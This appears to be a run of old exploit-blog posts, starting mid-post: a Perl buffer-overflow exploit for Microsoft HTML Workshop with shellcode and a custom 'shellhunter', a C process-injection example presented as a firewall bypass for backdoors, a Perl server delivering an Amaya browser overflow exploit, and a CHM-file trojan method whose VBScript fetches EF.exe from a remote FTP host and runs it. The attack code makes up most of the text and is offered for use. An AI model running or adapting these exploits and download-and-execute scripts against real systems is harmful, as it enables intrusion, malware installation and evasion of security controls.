Altogether it will occupy 8 bytes on the stack. Using it to our advantage we will need to make the “Pointer to exception handler code” point to our injected code from the overflowed buffer. And in our case, the Pointer to the next SEH record will be set to -1, which in hex form is 0xffffffff.

If you read the shellhunter code correctly you will say its sort of a loop. And you are right. It is a loop that it searches for the “lookout” value, if invalid, exception occurs and then again all over we set up SEH and check for “lookout”.

Save the current address variable somewhere in the heap

In this problem I used the address 0x7ffdfad0. Before setting up SEH, it will retrieve the variable at the address and before checking the value with a CMP, so not to lose the address, it will store it at that address.

Speedy search through memory

At the beginning when the shellhunter was in a premature phase, it searched through 4 bytes at a time. Trust me, It took a lot of time. To solve the problem, I used 32 bytes. But this also needed to increase the amount of “lookout” values that needed to be in the memory so the shellhunter would find it guaranteed (you can see that there are over 64*4 bytes of “lookout” value in the exploit!).

Repairing the Stack layout

This was one of the last problems I encountered when writing the shellhunter. I noticed that when SEH was called and the appropriate modules made their calls and other calculations, the stack would change. It would approximately decrease the ESP register by a couple hundred bytes. We cannot afford to have that because when the ESP register becomes a very low value, a stack overflow exception occurs, and when that is handled there is no space for any SEH to be set up! So to repair the stack I added bytes to the stack at every loop of the shellhunter also using a few pops/pushs instructions to increase the certain measure.

That’s all that you need to know that was added! Certainly, a shellhunter is a must-use in some cases for exploitation and I hope that you can implement the method for your exploits (do remember to credit me ;) )! If you got any problems with writing your certain exploit, and need a shellhunter, don’t hesitate to contact me at skdrathotmail<.>com (MSN Messenger).

Read the exploit below, and enjoy it!

Milw0rm exploit URL: http://milw0rm.com/exploits/7727

Exploit:

 
    #!/usr/bin/perl
    # Microsoft HTML Workshop <= 4.74 Universal Buffer Overflow Exploit
    # -----------------------------------------------------------------
    # Discovered/Exploit by SkD                    (skdrat@hotmail.com)
    # -----------------------------------------------------------------
    #
    # This is a continuation of my new method, shellhunting.
    # The exploit is far more advanced than the Amaya's as it runs on
    # every system, partly because the shellhunter itself is very much
    # reliable and universal.
    # The shellhunter does the following tasks to find and exec.
    # shellcode:-
    #
    # 1- Searches through the whole memory of the application.
    # 2- Installs a SEH handler so on access violations it won't
    #    stop hunting for the shellcode.
    # 3- Repairs stack so a stack overflow won't occur (that is what
    #    happens when the SEH is called up, many PUSH instructions
    #    are called from the relevant modules (ntdll, etc).
    # 4- Improved speed by searching through 32 bytes at a time.
    # 5- Uses a certain address in memory to store a variable for the
    #    search.
    #
    # It is very stable and will allow any shellcode (bind/reverse shell,
    # dl/exec). It will work on ALL Windows NT versions (2k, XP, Vista).
    #
    # Yeah, I guess that's about it. Took me a few hours to figure out the
    # whole thing but nothing is impossible ;).
    #
    # Oh, I think some schools use this software :) (it's Microsoft's, right?).
    #
    # You can download the app. from Microsoft's official page:
    # ->  http://msdn.microsoft.com/en-us/library/ms669985.aspx
    #
    # If you are interested in my method and want to learn something new or
    # improve your exploitation skills then visit my team's blog at:
    # ->  http://abysssec.com
    #
    # Peace out,
    # SkD.
 
    my $hhp_data1 = "\x5B\x4F\x50\x54\x49\x4F\x4E\x53".
    "\x5D\x0D\x0A\x43\x6F\x6E\x74\x65".
    "\x6E\x74\x73\x20\x66\x69\x6C\x65".
    "\x3D\x41\x0D\x0A\x49\x6E\x64\x65".
    "\x78\x20\x66\x69\x6C\x65\x3D";
    my $hhp_data2 = "\x5B\x46\x49\x4C\x45\x53\x5D\x0D".
    "\x0A\x61\x2E\x68\x74\x6D";
    my $crlf      = "\x0d\x0a";
 
    # win32_exec -  EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
    my $shellcode =
    "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
    "\x49\x49\x49\x49\x49\x49\x49\x48\x49\x49\x49\x49\x51\x5a\x6a\x46".
    "\x58\x30\x42\x30\x50\x42\x6b\x42\x41\x56\x42\x32\x42\x41\x41\x32".
    "\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x58\x69\x69\x6c\x4b".
    "\x58\x62\x64\x65\x50\x67\x70\x47\x70\x6c\x4b\x42\x65\x45\x6c\x6e".
    "\x6b\x73\x4c\x53\x35\x73\x48\x45\x51\x4a\x4f\x6c\x4b\x70\x4f\x52".
    "\x38\x4c\x4b\x33\x6f\x55\x70\x57\x71\x6a\x4b\x61\x59\x4c\x4b\x36".
    "\x54\x6e\x6b\x53\x31\x48\x6e\x55\x61\x39\x50\x4d\x49\x4c\x6c\x4d".
    "\x54\x6b\x70\x74\x34\x66\x67\x4b\x71\x78\x4a\x56\x6d\x67\x71\x39".
    "\x52\x48\x6b\x4c\x34\x35\x6b\x62\x74\x56\x44\x57\x74\x54\x35\x6b".
    "\x55\x4e\x6b\x31\x4f\x65\x74\x67\x71\x5a\x4b\x50\x66\x6c\x4b\x56".
    "\x6c\x42\x6b\x6e\x6b\x53\x6f\x47\x6c\x67\x71\x7a\x4b\x6c\x4b\x45".
    "\x4c\x6c\x4b\x47\x71\x48\x6b\x4f\x79\x33\x6c\x44\x64\x73\x34\x49".
    "\x53\x70\x31\x6b\x70\x71\x74\x4e\x6b\x73\x70\x56\x50\x4b\x35\x49".
    "\x50\x62\x58\x66\x6c\x4c\x4b\x43\x70\x56\x6c\x4c\x4b\x50\x70\x45".
    "\x4c\x4c\x6d\x6c\x4b\x35\x38\x77\x78\x78\x6b\x67\x79\x4e\x6b\x6b".
    "\x30\x6c\x70\x57\x70\x63\x30\x33\x30\x4c\x4b\x32\x48\x67\x4c\x73".
    "\x6f\x35\x61\x48\x76\x71\x70\x56\x36\x6c\x49\x4a\x58\x6e\x63\x69".
    "\x50\x41\x6b\x56\x30\x65\x38\x6c\x30\x6f\x7a\x75\x54\x73\x6f\x31".
    "\x78\x4e\x78\x79\x6e\x6f\x7a\x36\x6e\x66\x37\x6b\x4f\x5a\x47\x52".
    "\x43\x65\x31\x30\x6c\x70\x63\x45\x50\x46";
 
    #/----------------Advanced Shellhunter Code----------------\
    #01D717DD   EB 1E            JMP SHORT 01D717FD            |
    #01D717DF   83C4 64          ADD ESP,64                    |
    #01D717E2   83C4 64          ADD ESP,64                    |
    #01D717E5   83C4 64          ADD ESP,64                    |
    #01D717E8   83C4 64          ADD ESP,64                    |
    #01D717EB   83C4 64          ADD ESP,64                    |
    #01D717EE   83C4 64          ADD ESP,64                    |
    #01D717F1   83C4 64          ADD ESP,64                    |
    #01D717F4   83C4 64          ADD ESP,64                    |
    #01D717F7   83C4 64          ADD ESP,64                    |
    #01D717FA   83C4 54          ADD ESP,54                    |
    #01D717FD   33FF             XOR EDI,EDI                   |
    #01D717FF   BA D0FAFD7F      MOV EDX,7FFDFAD0              |
    #01D71804   8B3A             MOV EDI,DWORD PTR DS:[EDX]    |
    #01D71806   EB 0E            JMP SHORT 01D71816            |
    #01D71808   58               POP EAX                       |
    #01D71809   83E8 3C          SUB EAX,3C                    |
    #01D7180C   50               PUSH EAX                      |
    #01D7180D   6A FF            PUSH -1                       |
    #01D7180F   33DB             XOR EBX,EBX                   |
    #01D71811   64:8923          MOV DWORD PTR FS:[EBX],ESP    |
    #01D71814   EB 05            JMP SHORT 01D7181B            |
    #01D71816   E8 EDFFFFFF      CALL 01D71808                 |
    #01D7181B   B8 12121212      MOV EAX,12121212              |
    #01D71820   6BC0 02          IMUL EAX,EAX,2                |
    #01D71823   BA D0FAFD7F      MOV EDX,7FFDFAD0              |
    #01D71828   83C7 20          ADD EDI,20                    |
    #01D7182B   893A             MOV DWORD PTR DS:[EDX],EDI    |
    #01D7182D   3907             CMP DWORD PTR DS:[EDI],EAX    |
    #01D7182F  ^75 F7            JNZ SHORT 01D71828            |
    #01D71831   83C7 04          ADD EDI,4                     |
    #01D71834   6BC0 02          IMUL EAX,EAX,2                |
    #01D71837   3907             CMP DWORD PTR DS:[EDI],EAX    |
    #01D71839  ^75 E0            JNZ SHORT 01D7181B            |
    #01D7183B   83C7 04          ADD EDI,4                     |
    #01D7183E   B8 42424242      MOV EAX,42424242              |
    #01D71843   3907             CMP DWORD PTR DS:[EDI],EAX    |
    #01D71845  ^75 D4            JNZ SHORT 01D7181B            |
    #01D71847   83C7 04          ADD EDI,4                     |
    #01D7184A   FFE7             JMP EDI                       |
    #\-----------------------End of Code----------------------/
 
    my $shellhunter = "\xeb\x1e".
    "\x83\xc4\x64".
    "\x83\xc4\x64".
    "\x83\xc4\x64".
    "\x83\xc4\x64".
    "\x83\xc4\x64".
    "\x83\xc4\x64".
    "\x83\xc4\x64".
    "\x83\xc4\x64".
    "\x83\xc4\x64".
    "\x83\xc4\x54".
    "\x33\xff".
    "\xba\xd0\xfa\xfd\x7f".
    "\x8b\x3a".
    "\xeb\x0e".
    "\x58".
    "\x83\xe8\x3c".
    "\x50".
    "\x6a\xff".
    "\x33\xdb".
    "\x64\x89\x23".
    "\xeb\x05".
    "\xe8\xed\xff\xff\xff".
    "\xb8\x12\x12\x12\x12".
    "\x6b\xc0\x02".
    "\xba\xd0\xfa\xfd\x7f".
    "\x83\xc7\x20".
    "\x89\x3a".
    "\x39\x07".
    "\x75\xf7".
    "\x83\xc7\x04".
    "\x6b\xc0\x02".
    "\x39\x07".
    "\x75\xe0".
    "\x83\xc7\x04".
    "\xb8\x42\x42\x42\x42".
    "\x39\x07".
    "\x75\xd4".
    "\x83\xc7\x04".
    "\xff\xe7";
    my $lookout1 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42" x 64;
    my $lookout2 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42\x42" x 64;
    my $lookout3 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42\x42\x42" x 64;
    my $lookout4 = "\x24\x24\x24\x24\x48\x48\x48\x48\x42\x42\x42\x42\x42\x42\x42" x 64;
    my $len = 280 - (length($shellhunter) + 55);
    my $overflow1 = "\x41" x $len;
    my $overflow2 = "\x41" x 55;
    my $overflow3 = "\x42" x 256;
    my $ret = "\x93\x1f\x40\x00"; #0x00401f93   CALL EDI [hhw.exe]
 
    open(my $hhpprj_file, "> s.hhp");
    print $hhpprj_file $hhp_data1.
    $overflow1.$shellhunter.$overflow2.$ret.
    $crlf.$crlf.
    $hhp_data2.
    $overflow3.$lookout1.$lookout2.$lookout3.$lookout4.$shellcode.$overflow3.
    $crlf;
    close $hhpprj_file;

How Bypass firewall with Process Injection

daphne — Fri, 02 Jan 2009 20:52:52 +0000

Hello Friends .

First question is why Process Injection ?

in this method we can attach evil Process to permitted Process . as you know , firewalls Permit to some Process , like : Internet explorer [IE] or Firefox or windows update or … . this Processes can connect to Internet very well [ often ] .

Process injection , Dll injection , “PE injection “ are methods to bypass firewalls [This Methods called as : Leak Firewall ] .

in dll injection , we injects dll into an application process area, and references to his own malicious DLL to make firewall believes that it’s the application which is using the DLL .

Today when we talk about injection, we are talking about a DLL that is loaded into a running process’s memory. as we know Windows is now designed for this, and injection techniques can be used by any application. Some applications use it to add features to a closed-source program [for example : Babylon Dictionary is One of them ] .

I,m not intend to talk about these [dll ,process Injection ] at this time . and i just want talk about Process injection [ or hijack] to bypass firewalls .

Attention To modeling :

Principle of application run [default ] :

when inclusion of a dynamic library [dll] :

inserting malicious code in the process of confidence :

Used internet Explorer [trusted Software ] for injection :

The following illustration shows the general Code injection with windows API method [virtualAllocEX(),..]

how to Inject Process : [with C cod ]

for firewall bypass we have 4 part :

- Open one process “P”
- Allocate memory remotely in “P” space
- Copy the code to remote process
- Create a thread to execute the code remotely
[will happen]

Example Of Process Injection In EXPLORER.EXE [code ]:

 
    #pragma comment(lib,"Shlwapi.lib")
    #pragma comment(lib,"ADVAPI32.LIB")
    #include 
    #include 
    #include 
    #include 
    #define INJECT_EXE  "explorer.exe"
 
    typedef struct _RPar
    {
    DWORD dwDeleteFile;
    DWORD dwSleep;
    DWORD dwMessageBox;
    char Filename[1024];
    char string1[1024];
    char string2[1024];
    } RPar;
    DWORD __stdcall ThreadProc(RPar *Para)
    {
    FARPROC PDeleteFile = (FARPROC)Para->dwDeleteFile;
    FARPROC PSleep = (FARPROC)Para->dwSleep;
    FARPROC PMessageBox = (FARPROC)Para->dwMessageBox;
 
    PMessageBox(NULL,Para->string1,Para->string2,MB_OK);
 
    while(PDeleteFile(Para->Filename) == 0) {PSleep(1000);}
    return 0;
    }
    int _stdcall WinMain(HINSTANCE hInst, HINSTANCE hPrevInst, LPSTR lpCmd, int nCmdShow)
    {
    DWORD dwThreadId,pID=0,dwThreadSize=2048;
    void *pRemoteThread;
    char ExeFile[1024];
    HANDLE hProcess,hSnap;
    HINSTANCE hKernel, hUser;
    RPar my_RPar,*pmy_RPar;
    PROCESSENTRY32 pe32 = {0};
    if( (hSnap =CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)) == INVALID_HANDLE_VALUE )
    return 3;
    pe32.dwSize = sizeof(PROCESSENTRY32);
    Process32First(hSnap, &pe32);
    do {
    if ( StrCmpNI(INJECT_EXE,pe32.szExeFile,strlen(INJECT_EXE)) == 0)
    {
    pID=pe32.th32ProcessID;
    break;
    }
    } while (Process32Next(hSnap,&pe32));
 
    if ( hSnap != INVALID_HANDLE_VALUE )
    CloseHandle(hSnap);
    hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,pID);
    pRemoteThread = VirtualAllocEx(hProcess, 0, dwThreadSize, MEM_COMMIT | MEM_RESERVE,PAGE_EXECUTE_READWRITE);
 
    WriteProcessMemory(hProcess, pRemoteThread, &ThreadProc, dwThreadSize,0);
    ZeroMemory(&my_RPar,sizeof(RPar));
    hKernel = LoadLibrary( "kernel32.dll");
    my_RPar.dwDeleteFile = (DWORD)GetProcAddress(hKernel, "DeleteFileA");
    my_RPar.dwSleep = (DWORD)GetProcAddress(hKernel, "Sleep");
    hUser = LoadLibrary( "user32.dll");
    my_RPar.dwMessageBox = (DWORD)GetProcAddress(hUser, "MessageBoxA");
    GetModuleFileName(NULL,ExeFile,1024);
    printf (ExeFile);
    strcpy(my_RPar.Filename, ExeFile);
    strcpy(my_RPar.string1, "HI Abysssec");
    strcpy(my_RPar.string2, "OK");
    pmy_RPar =(RPar *)VirtualAllocEx (hProcess ,0,sizeof(RPar),MEM_COMMIT,PAGE_READWRITE);
    WriteProcessMemory(hProcess ,pmy_RPar,&my_RPar,sizeof my_RPar,0);
    CreateRemoteThread(hProcess ,0,0,(DWORD (__stdcall *)(void *))pRemoteThread ,pmy_RPar,0,&dwThreadId);
    FreeLibrary(hKernel);
    CloseHandle(hProcess);
    system("tasklist");
    return 0;
    }

what Happens When Firewall bypass ?

in servers :

we can call "Internet explorer" or other trusted Application with [ASP.NET Execute Permission ] and run backdoor in any port .

with this method , we can telnet to open port of server without any worry .

In Client :

Backdoor , Trojans , bad software , connect to internet without Access .

Real Word [ Discovered By Abysssec ] test :

Vulnerability Firewall [Outpost 2009 ] :

http://www.agnitum.com/products/outpost/

You can Inject Process In IE7 or Mozilla Firefox [default Trusted ] .

[Sorry For more information , This bug is not fixed , You can test it with Process Injector tools ].

www.tarasco.org

[pinjector.exe] :

Download Link + source :

http://www.tarasco.org/security/pinjector/index.html

Final deduction:

1- We can Bypass some firewalls : Don't checked Allocated Memory in Trusted Process .

2- Dll , Process , PE injection is useful way to run Process without new Prosess ID [PID] .

In Future :

1- Usage Of these Method In other bypass Protections [hybrid or frees Protection ]

2 - PE INJECTION , why , what , where !?

More Information :

http://www.tarasco.org/security/pinjector/Win32.Design.Flaws.pdf

http://www.firewallleaktester.com/docs/leaktest.pdf

http://www.bluenotch.com/files/Shewmaker-DLL-Injection.pdf

--------------------------------------------------------------------------------------

Happy new year and holy days

god speed you

Daphne

Amaya Web Browser

shahin — Sat, 27 Dec 2008 01:04:25 +0000

Amaya Web Browser <= 11.0.1 Remote Buffer Overflow Exploit

Vulnerability discovery & Exploit by SkD

We will start with a description of the affected software:

Amaya is a Web editor, i.e. a tool used to create and update documents directly on the Web. Browsing features are seamlessly integrated with the editing and remote access features in a uniform environment. This follows the original vision of the Web as a space for collaboration and not just a one-way publishing medium.

The vulnerability lies in the way Amaya (version 11.0.1 and below) parses HTML tags. Certain tags trigger different vulnerabilites, mostly overflows but each has a different environment for exploitation.

I selected that the “” and the “” tags were the most convenient to use for the exploit.

Here is a picture of the debugger’s state when the buffer overflow occurs with the “” tag:

As we can see the EIP is fully controllable but to exploit the issue there are quite a few problems:

The buffer can only have characters from (hex) 0×00 to 0x7f, 0×80 => and above will corrupt the buffer with uneeded characters so the putting the shellcode and finding return addresses will be a problem.
Registers point at random places except for ESI which can be controlled to point to a specified location with a correct calculation.
Finding a JMP ESP/CALL ESP in one of the Amaya’s native modules will be hard because none of them include the allowed characters (we want to make it universal).
Heap layout is randomized.

Please note that I was working on this on Windows Vista SP1 so it may differ with XP, 2003, etc.

Okay, so what can we do? This won’t be exploited the normal way with the classic jmp esp or there isn’t any SEH handlers to exploit so what is there to do? Like I mentioned in the previous list, ESI points to a controllable region in the stack. This region will vary if a calculation for the junk characters is not correct (you will see what I am talking about in the exploit code). So to combat this problem we must look to the heap for the clean buffer before transformation. Guess what? EDI points close to this but it is random so I cannot just decrease EDI by a static number! What I did was a similar method to egghunting as in heap overflows but my new method is called, shellhunting. The conclusion is that the shellhunter must be alphanumerical (well, mostly) and it must look for the shellcode in the heap pointed by EDI.

This is a advanced stack overflow exploit which also involves the heap! Please remember that this will only work on Vista SP 1 ( I tested it on XP but different heap layouts again made it a hassle for me to change :) ).

This is the stack and memory when the buffer involves characters over 0×80 (this is the shellcode):

And here is the shellcode so you can compare!

my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
"\x4e\x46\x43\x36\x42\x50\x5a";

Very corrupted data, like that we cannot execute anything because of malformed instructions (the decoder for the alphanumerical shellcode will have also no chance to work). It is clear that the only way will be to look at the heap.

Now I will describe how my shellhunter works!

The shellhunter will start as being 98% alphanumerical so it can be successfully executed.
The “lookout” values must not cause an exception because we will redirect the execution flow to those values!
It will loop and search the heap for the “lookout” values INFRONT of the shellcode.
Once the “lookout” values are located, PUSH EDI and then RETN to that address.

This is efficient and it will work one-hundred percent on every try the browser parses the HTML page.

You can also see that I am using an addition with the $additionaddr variable, this is because the variable cannot be on the heap next to the corrupted data! So we basicially add a few bytes to the variable in the register EAX that holds the $additionaddr that will turn into the “lookout” value so the shellhunter can easily compare data in the heap!

I hope you learned something today ladies and gents! The exploit is included below!

#!/usr/bin/perl
#
# Amaya Web Browser <= 11.0.1 Remote Buffer Overflow Exploit
# Found/Exploit by SkD (skdrat@hotmail.com)
#                (skd@abysssec.com  )
# -----------------------------------------------
# This is advanced buffer overflow exploitation using
# my new method called shellhunting :)
#
# Get more information about this at http://abysssec.com
#
# Exploit works only on a fully patched Vista SP1, but you
# may need to click 'Refresh' to make the shellcode exec
# sometimes.
#
# Note: Author has no responsibility over the damage you do with this!
 
use strict;
use warnings;
use IO::Socket;
 
my $html;
my $port_listen = 80; # change this to your desired port!
my $listenip = "127.0.0.1"; # change this to your desired IP!
 
# win32_exec -  EXITFUNC=seh CMD=calc Size=343 Encoder=PexAlphaNum http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x44".
"\x42\x30\x42\x50\x42\x30\x4b\x48\x45\x54\x4e\x43\x4b\x38\x4e\x47".
"\x45\x50\x4a\x57\x41\x30\x4f\x4e\x4b\x58\x4f\x54\x4a\x41\x4b\x38".
"\x4f\x45\x42\x42\x41\x50\x4b\x4e\x49\x44\x4b\x38\x46\x33\x4b\x48".
"\x41\x50\x50\x4e\x41\x53\x42\x4c\x49\x59\x4e\x4a\x46\x58\x42\x4c".
"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
"\x46\x4f\x4b\x53\x46\x55\x46\x32\x46\x50\x45\x47\x45\x4e\x4b\x58".
"\x4f\x45\x46\x52\x41\x50\x4b\x4e\x48\x56\x4b\x58\x4e\x50\x4b\x44".
"\x4b\x48\x4f\x55\x4e\x41\x41\x30\x4b\x4e\x4b\x58\x4e\x41\x4b\x38".
"\x41\x50\x4b\x4e\x49\x48\x4e\x45\x46\x32\x46\x50\x43\x4c\x41\x33".
"\x42\x4c\x46\x46\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x47".
"\x4e\x30\x4b\x48\x42\x44\x4e\x50\x4b\x58\x42\x37\x4e\x51\x4d\x4a".
"\x4b\x48\x4a\x36\x4a\x30\x4b\x4e\x49\x50\x4b\x38\x42\x58\x42\x4b".
"\x42\x50\x42\x50\x42\x50\x4b\x38\x4a\x36\x4e\x43\x4f\x45\x41\x53".
"\x48\x4f\x42\x46\x48\x35\x49\x38\x4a\x4f\x43\x48\x42\x4c\x4b\x57".
"\x42\x45\x4a\x36\x42\x4f\x4c\x38\x46\x30\x4f\x35\x4a\x46\x4a\x39".
"\x50\x4f\x4c\x38\x50\x50\x47\x55\x4f\x4f\x47\x4e\x43\x46\x41\x46".
"\x4e\x46\x43\x36\x42\x50\x5a";
 
# my own shell hunter.. :) it is 98% alphanumerical.
# 2nd variant of the shellhunter, to make the exploit more reliable..
my $shellhunter = ("\x58\x58\x40\x40").("\x47" x 4).("\x42" x 6).     #inc edi
("\x42" x 24).("\x42" x 24).("\x39\x07\x75\x8b\x71\x71").
("\x47\x47\x47\x47\x57\xFF\x65\x78\x77\x76");
my $overflow = "\x42" x 158;
my $overflow2 = "\x42" x 4;
my $overflow3 = "\x43" x 430;
my $overflow4len = 977 - ((length($shellhunter) - 7));   #very important calculation
my $overflow4 = "\x44" x $overflow4len;
my $sled = "\x42" x 12;
my $sled2 = "\x41" x 24;
my $eip2 = "\x37\x55\x03\x10";  #10035537 call ecx, this won't be used
my $eip1 = "\x30\x4f\x01\x10"; #10014F30 call esi, this will be used.
my $heapaddr = "\x50\x0e\x08\x10";    #valid char for buffer, heap address
my $lookout = "\x37\x65\x41\x45" x 40;      # 45446537    look out values <-
my $lookout2 = "\x37\x65\x41\x45\x41" x 4;      # 45446537                <-
my $lookout3 = "\x37\x65\x41\x45\x41\x41" x 4;      # 45446537            <-
my $lookout4 = "\x37\x65\x41\x45\x41\x41\x41" x 4;      # 45446537        <-
my $additionaddr = "\x35\x65\x41\x45";    #used for an addition in the shellhunter  (+2)
my $nopsled = "\x90\x90\x90\x90\x90\x90";
my $jmp = "\x75\x0c";
print "[x] Amaya Web Browser <= 11.0.1 Remote Buffer Overflow Exploit\n";
print "[x] Found/Exploit by SkD (skdrat@ hotmail.com)(skd@ abysssec.com)\n";
 
while(1)
{
my $sock=new IO::Socket::INET(Listen=>;1,LocalAddr =>; $listenip,LocalPort=>;$port_listen,Proto=>;'tcp');
die unless $sock;
print "[x] Waiting for clients on port ".$port_listen."..\n";
my $s;
while($s=$sock->;accept()){
print "[x] Got a client!\n";
my $request = <;$s>;;
print $s "HTTP/1.0 200 OK\nContent-Type: text/html\n\n";
print "[x] Serving Exploit HTML page :)\n";
print $s "\n".
"\n".
"\n".
"
\n".
"
 
\n".
"\n".
"\r\n";
sleep(0.5);
close $s;
print "[x] Done!\n";
}
}

Execute with .CHM file.

daphne — Sun, 14 Dec 2008 18:14:42 +0000

Hi .

In this post i wanna talk about Execute with CHM file or be honest How we can run Trojan, Backdoor In CHM file ? and we will have a few talk Bypass Script Protection In IE .

A CHM help file has a “.chm” extension. It has a set of web pages written in a subset of HTML and a hyperlinked table of contents. CHM format is optimized for reading, as files are heavily indexed. All files are compressed together with LZX compression. Most CHM browsers have the capability to display a table of contents outside of the body text of the help file.

Engine Of CHM :

CHM run HTML page Based On Internet Explorer Engine .

when you run “VBSCRIPT” or “Activex” or “Object” with Internet Explorer 7 or higher , Script Protection (Activex Security Control) , Alert To User & Block Script .

when we are during running a CHM file , we Can Run & Execute “Object” + “Vb Script” + “JavaScript “ Without Any Error , but If our Script inclusive ActiveX control , We will See a Basic Alert .

Execute IN CHM :

we Need A Program To Create CHM file , I like to USE WINCHM (free Edition) :

http://www.softany.com/winchm/

For Edit VBSCRIPT [With IDE] :

http://www.vbsedit.com/

Offline Mode (Intro) :

With This Object ID :

{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}

Call “Windows Script Host Shell Object ” with Object :

Example :

classid=”clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B”>

Or :

Online Mode (Backdoor & Script Bypass Mode ) :

we have three Step to do :

1- Download .EXE file (without User InterAction)
2- Save File in Victim PC .
3- RUN It .

for download with VBSCRIPT I USED This Objects :

-Microsoft.XMLHTTP
-MSXML2.ServerXMLHTTP
-WinHttp.WinHttpRequest.5.1
-WinHttp.WinHttpRequest

Following This Example :

SAVE FILE [ Achilles heel IN CHM ] :

Save File & Execute Objects , Run Activex In IE & CHM .

IF You Can Find a way to bypass ActiveX Alert You can Find lot’s of BUG‘s .

Example OF Bug :

http://www.milw0rm.com/exploits/719 [2004]

Activex Alert :

Note : we have some bypass trick maybe we disclosure a few of them here soon .

But until that Time You can use This method for Download [FTP Client ] :

Option Explicit
Dim objFSO, objMyFile, objShell, strFTPScriptFileName
Dim strLocalFolderName, strFTPServerName, strLoginID, strFTPServerDir
Dim strPassword, strFTPServerFolder, objPassword, objFolder,FolderContent, fso, CleanPath, file, Flag

‘Change this, foldername = local dir (where files must be ftp’d TO)
strLocalFolderName = “c:\”

‘ Server where you are ftp’ing TO
strFTPServerName = “abysssec.com”

‘ Username you use to ftp
strLoginID = “test”

‘ Initialize variables
strPassword = “test”
strFTPServerDir = “/www”

‘ Change this to the folder where the files are on the source server
strFTPServerFolder = “/www”

‘The follow lines of code generate the FTP script file on the fly,
‘because the directory name changes every time its run

strFTPScriptFileName = strLocalFolderName & “\FTPScript.txt”

Set objFSO = CreateObject(“Scripting.FileSystemObject”)

If (objFSO.FileExists(strFTPScriptFileName)) Then
objFSO.DeleteFile(strFTPScriptFileName)
End If

Set objMyFile = objFSO.CreateTextFile(strFTPScriptFileName, True)
‘objMyFile.WriteLine (“ftp -s open ” & strFTPServerName)
objMyFile.WriteLine (“open ” & strFTPServerName)
objMyFile.WriteLine (strLoginID)
objMyFile.WriteLine (strPassword)

‘strFTPServerDir = InputBox(“Enter directory from which to ftp:”)

‘objMyFile.WriteLine (“cd ” & strFTPServerFolder & strFTPServerDir)
objMyFile.WriteLine (“cd ” & strFTPServerFolder)
‘objMyFile.WriteLine (“bin”)
objMyFile.WriteLine (“lcd ” & strLocalFolderName)
objMyFile.WriteLine (“get EF.exe”)
objMyFile.WriteLine (“bye”)
objMyFile.Close

Set objFSO = Nothing
Set objMyFile = Nothing

‘The following code executes the FTP script. It creates a Shell
‘object and run FTP program on top of it.
Set objShell = WScript.CreateObject( “WScript.Shell” )
objShell.Run (“ftp -s:” & chr(34) & strFTPScriptFileName & chr(34))
‘objShell.Run (strFTPScriptFileName & chr(34))
Set objShell = Nothing

Set fso=CreateObject(“Scripting.FileSystemObject”)
CleanPath=”c:\”

For Each file In fso.GetFolder(strLocalFolderName).Files
Flag = StrComp(file, strFTPScriptFileName ,1)
